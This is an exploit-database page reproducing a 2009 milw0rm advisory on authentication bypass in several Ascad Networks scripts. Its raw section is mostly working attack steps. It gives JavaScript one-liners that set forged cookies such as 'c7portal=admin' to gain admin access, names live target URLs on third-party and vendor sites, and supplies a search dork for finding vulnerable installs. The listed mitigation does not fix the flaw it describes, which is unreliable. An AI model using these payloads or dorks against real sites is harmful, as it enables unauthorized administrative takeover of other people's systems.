header-logo
Suggest Exploit
vendor:
c7 Portal, Password Protector SD v2 (ppSD2) and Form Processor Gold
by:
G4N0K
7,5
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: c7 Portal, Password Protector SD v2 (ppSD2) and Form Processor Gold
Affected Version From: 1.1.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:ascad_networks:c7_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ascad Networks 5 Products Insecure Cookie Handling Vulnerability

Ascad Networks 5 products are vulnerable to insecure cookie handling. An attacker can set a cookie with the name 'c7portal' and value 'admin' to gain administrative access. The vulnerable products are c7 Portal v1.1.0, Password Protector SD v2 (ppSD2) and Form Processor Gold. The dork for c7 Portal is 'intitle:"c7 Portal by Ascad Networks"'

Mitigation:

Ensure that cookies are set with the 'HttpOnly' flag and that the 'Secure' flag is set when using HTTPS.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\...FROM IRAN

==============================================================================
	Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
==============================================================================

	[»] Script:.............[ Ascad Networks Scripts ]....................
	[»] Website:............[ http://www.ascadnetworks.com ]..............
	[»] Today:..............[ 1305009 ]...................................
	[»] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......


	
	 [+] c7 Portal <= v1.1.0
	===============================
	
	Live...: http://hatcocorporation.com/c7/

        [0] javascript:document.cookie = "c7portal=admin";
		[1] now navigate to: http://hatcocorporation.com/c7/home/
            esle, you will fall into a loop ;)...

        [1] d0rk: intitle:"c7 Portal by Ascad Networks"

	


	 [+] Password Protector SD v2 (ppSD2)
	===============================
	
	Live...: http://ppsd2008.passwordprotectorsd.com/ppSD2/admin/

        [0] javascript:document.cookie = "c7portal=admin";





	 [+] Form Processor Gold
	===============================
	
	Live...: http://www.ascadnetworks.com/cgi-bin/demos/fp_gold/admin.pl

        [0] javascript:document.cookie = "FormProGold=in";





	 [+] Guestbook Creator v1.5
	===============================
	
	Live...: http://www.ascadnetworks.com/cgi-bin/demos/gb/admin.pl

        [0] javascript:document.cookie = "ascadnetworks_gbook_admin=in";





	 [+] Mini Forum v1.0.1
	===============================
	
	Live...: http://www.ascadnetworks.com/cgi-bin/demos/mf/admin.pl

        [0] javascript:document.cookie = "admf=admin";




	 [+] Greetz
	===================================
	[»] ALLAH
	[»] MSD, AMD, AFN, SMN...
	[»] Hussain-X, JiKo, Sakab(!)...

# milw0rm.com [2009-05-14]

Navigation

Suggest Exploit

Services By CQR